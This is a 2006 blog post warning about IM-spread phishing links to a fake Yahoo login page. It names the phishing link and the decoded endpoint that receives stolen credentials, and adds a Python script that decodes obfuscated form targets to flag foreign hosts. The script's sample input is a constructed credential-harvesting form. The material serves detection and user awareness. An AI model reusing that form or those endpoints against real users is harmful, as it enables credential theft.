SPIM, Phishing, and You!
Aug. 10th, 2006 09:50 am
So, there you are, on your IM client, and a friend sends you a link out of the blue, no hello or anything, just an innocuous link like this:
http:// www . geocities . com / input_on_new_pics_plz
Don't ever go to links that people send you out of the blue without some obvious tip-off: have you been talking already? Is it obviously going to a site in which you have a shared obscure interest?
No?
Then DON'T GO!
If you do, in this case, you get a nice-looking page that asks for your Yahoo name and password. If you have that gullible moment and type them in, whoever is behind the page will use them to collect more usernames and passwords, and will then have access to all your Yahoogroups--and Yahoo mail, if you use that, and so on.
If this happens to you, no software has been installed on your machine: this is all being done remotely. To lock the asshats back out, change your Yahoo password and they will no longer have access. Count yourself lucky, as other spim-trojans do change passwords, as others have found to their peril.
This has been a Public Service Announcement; more details behind this cut.
Picking apart the code reveals several obfuscated URLs and some equally obfuscated Javascript, useful to defeat ad blockers and protect source code. A Geocities ad server in Taiwan is lame, but legitimate. The encrypted Javascript was more than I wanted to pick at, but obfuscated URLs are easy.
The page sends your Yahoo name and password to a lengthy obfuscated URL, which I threw to the demons, particularly http://www.netdemon.net/decode.html. Decoded, your name and password get sent to:
http://www2.fiberbit.net/form/mailto.cgi
Congratulations, it just got e-mailed to Person or Persons Unknown, and your credentials will now be used to collect more names and passwords, with which the aforementioned miscreants can IM your friends, get their names and passwords, and e-mail any Yahoogroup to which you are subscribed--if you own a Yahoogroup or two, it gets worse. The only good thing you can say is that, well, at least it didn't change your Yahoo password for you.
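The decoding step above, done by hand with the netdemon page, can be scripted: pull every form action and script-embedded URL out of a saved copy of a suspect login page, strip the layered %XX and \xXX obfuscation, and flag any submit target whose host is not the site the page claims to be. This is an added example, not code from the post; the sample page is constructed (only the decoded destination comes from the post), and the trusted suffix yahoo.com is an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample (not the real page): a fake Yahoo login form whose action is
# percent-encoded, plus a script holding the same URL written with \x escapes.
SAMPLE_PAGE = """<form action="%68%74%74%70%3A%2F%2Fwww2.fiberbit.net%2Fform%2Fmailto.cgi" method="post">
<input name="login"><input name="passwd" type="password"><input type="submit"></form>
<script>var u="\\x68\\x74\\x74\\x70://www2.fiberbit.net/form/mailto.cgi";</script>"""

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def deobfuscate(s):
    """Undo layered %XX and \\xXX encoding until the string stops changing."""
    while True:
        decoded = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), unquote(s))
        if decoded == s:
            return s
        s = decoded

class _Collector(HTMLParser):
    """Gather form actions and double-quoted string literals inside <script>."""
    def __init__(self):
        super().__init__()
        self.candidates, self._in_script = [], False
    def handle_starttag(self, tag, attrs):
        self._in_script = self._in_script or tag == "script"
        if tag == "form":
            self.candidates += [v for k, v in attrs if k == "action" and v]
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.candidates += re.findall(r'"([^"]*)"', data)

def credential_sinks(html, trusted_suffixes=("yahoo.com",)):
    """Return (decoded_url, host, is_foreign) for each place the page could send credentials."""
    collector = _Collector()
    collector.feed(html)
    results = []
    for raw in collector.candidates:
        url = deobfuscate(raw)
        host = urlparse(url).hostname or ""
        if not host:
            continue  # relative actions or non-URL string literals
        foreign = not any(host == s or host.endswith("." + s) for s in trusted_suffixes)
        results.append((url, host, foreign))
    return results

if __name__ == "__main__":
    for url, host, foreign in credential_sinks(SAMPLE_PAGE):
        print(("FOREIGN " if foreign else "ok      ") + host + "  <-  " + url)
```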
This is a clever combination of social engineering (getting people to do what they're already inclined to) and phishing (using a faked legitimate-looking page to get real information)--clever because it's coming along an unexpected vector.
Unexpected...until you're bitten by one. I've known several who were (by this or another), two of whom have extensive experience in IT and therefore Should Have Known Better.
Don't let this happen to you!
-- Lorrie
Comment, 2006-08-10 11:25 pm (UTC):
You should tell whoever got bit that they've been bit, though--at least they can fix themselves by changing their Yahoo password.
-- Lorrie